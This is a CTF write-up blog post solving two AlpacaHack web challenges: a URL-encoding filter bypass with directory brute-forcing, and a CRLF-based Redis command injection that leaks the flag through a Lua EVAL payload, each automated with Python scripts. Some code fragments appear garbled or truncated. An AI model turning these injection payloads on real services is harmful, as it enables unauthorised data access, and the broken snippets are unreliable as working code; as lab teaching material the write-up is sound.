AlpacaHack CTF 2024 Web Writeups
While searching for a CTF to participate in this weekend with my team (FF2), I stumbled upon one by accident—and it turned out to be a great find! Hosted by a group from Tokyo, AlpacaHack is a CTF platform that organizes monthly CTF competitions (rounds), each focusing on a different theme. This time, it was web security!
“Treasure Hunt” (116 pts, 71 solves)
Inside the challenge’s files we have the server code files along with some random files containing emojis
in the Dockerfile
, we can see this weird flag storing method:
after pasting it to terminal, we can see that flag’s path is
(a-f, 1-9)
while public
means that we can GET to this file.
In index.js
, at GET /
the server returns this html that contains the files under the ./public
The server also returns
if the url contains f,l,a,g
I’ve managed to bypass this check by passing the letters as url encoded:
now we need to get into the flag’s directory and get the flag.
To do that, I need a way to find if any directory exist on the server, and I can do that by sending a request to the a directory (without /
), for example: GET /hello
If this directory exist server automatically redirects me to /hello/
Let’s see how I can automate it with python to get the flag.
import httpx
url = ""
chars = "0123456789abcdeflagtxt"
flag = ""
with httpx.Client(base_url=url) as client:
while True:
for c in chars:
path = flag + "/" + f"%{ord(c):02X}"
response = client.get(path)
if response.status_code == 301:
flag = path
elif response.status_code == 200:
I’ve tried to make it with requests
but it keeps redirecting me so I had to do it with httpx…
“Alpaca Poll” (146 pts, 42 solves)
This challenge suppose to be a poll site… let’s look at the source code:
we can see that this one uses redis
, let’s see how he manages to speak with the server.
by taking a look on these functions (and comments lol), we can understand that we have to find an injection in here.
also, in the init function, we can see that the flag is in a
redis key
named flag
I’ll deploy this challenge locally because of this function that prints the input/output of the redis:
Let’s now focus on the POST /vote
The replace()
only replaces the first appearance of the provided char… that means we can bypass this check and have a command injection.
const message = `INCR ${animal}\r\n`;
so for injection, we need to get message to be:
const message = `INCR dog\r\nGET flag\r\n`;
and to make it happen, we need animal
’s value to be: \r\ndog\r\nGET flag
the first \r\n
are deleted because of the replace() function, and the rest is not moving anywhare.
and after url encoding:
in the server, it looks like that (redis command injected successfully):
Now we need to of a creative way to make the client see the value of the flag!
as you can see, every value that is being returned, is getting inside the
that means we can’t return a string of the flag, BUT, we CAN return the ascii value of each letter in the flag, and get it inside a string key like dog, and send a request to \getVotes
to get a dictionary of the results!
After some research, we can do it using the EVAL
cmd in redis
that executes a lua
script that gives more features to the command.
`EVAL "'SET', 'dog', string.byte('GET', 'flag'), 1))" 0`
this will set dog’s value to be flag’s value at specific index of this string!
Now I can automate it with python:
import requests
import json
import time
index = 1
vote_url = "http://localhost:3000/vote"
get_votes_url = "http://localhost:3000/votes"
flag = ""
while True:
animal_value = f"\r\ndog\r\nEVAL \"'SET', 'dog', string.byte('GET', 'flag'), {index}))\" 0"
res =, data={"animal": animal_value})
res2 = requests.get(get_votes_url)
flag += chr(json.loads(res2.text)["dog"])
index += 1
if chr(json.loads(res2.text)["dog"]) == '}': break
this does the job :)
Now, instead of localhost, let’s put our instance:
vote_url = ""
get_votes_url = ""